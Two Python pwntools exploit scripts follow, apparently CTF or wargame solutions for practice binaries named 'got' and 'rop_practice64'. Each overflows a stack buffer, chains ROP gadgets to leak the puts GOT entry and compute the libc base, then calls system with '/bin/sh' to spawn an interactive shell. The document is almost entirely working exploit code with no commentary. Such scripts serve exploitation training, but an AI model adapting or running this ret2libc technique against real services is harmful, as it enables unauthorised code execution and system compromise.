got

from pwn import *

context.log_level = 'debug'
r = process('./got')
e = ELF('./got')
libc = e.libc

pr = e.symbols['__libc_csu_init'] + 99
puts_got = e.got['puts']
puts_plt = e.plt['puts']

r.recvuntil("practice")
pay = "A" * 0x10
pay += "A" * 0x8
pay += p64(pr) + p64(puts_got) + p64(puts_plt) + p64(e.symbols['main'])
r.sendline(pay)

libc_base = u64(r.recvuntil('\\x7f')[-6:] + "\\x00\\x00") - libc.symbols['puts']
system = libc.symbols['system'] + libc_base
binsh = libc.search("/bin/sh").next() + libc_base

print hex(libc_base)

pay = "A" * 0x10
pay += "A" * 0x8
pay += p64(0x00000000004004c9) + p64(pr) + p64(binsh) + p64(system)
r.sendline(pay)
r.interactive()

rop_practice64

from pwn import *

context.log_level = 'debug'
r = process("./rop_practice64")
e = ELF("./rop_practice64")
libc = e.libc

puts_plt = e.plt['puts']
puts_got = e.got['puts']
pr = 0x0000000000400703
ret = 0x00000000004004c9

r.recvuntil("!")
pay = "A" * 0x20
pay += "A" * 8
pay += p64(pr) + p64(puts_got) + p64(puts_plt) + p64(e.symbols['main'])
r.sendline(pay)

libc_base = u64(r.recvuntil('\\x7f')[-6:] + "\\x00\\x00") - libc.symbols['puts']
system = libc.symbols['system'] + libc_base
binsh = libc.search("/bin/sh").next() + libc_base

print (hex(libc_base))

pay = "A" * 0x20
pay += "A" * 8
pay += p64(ret) + p64(pr) + p64(binsh) + p64(system)
r.sendline(pay)
r.interactive()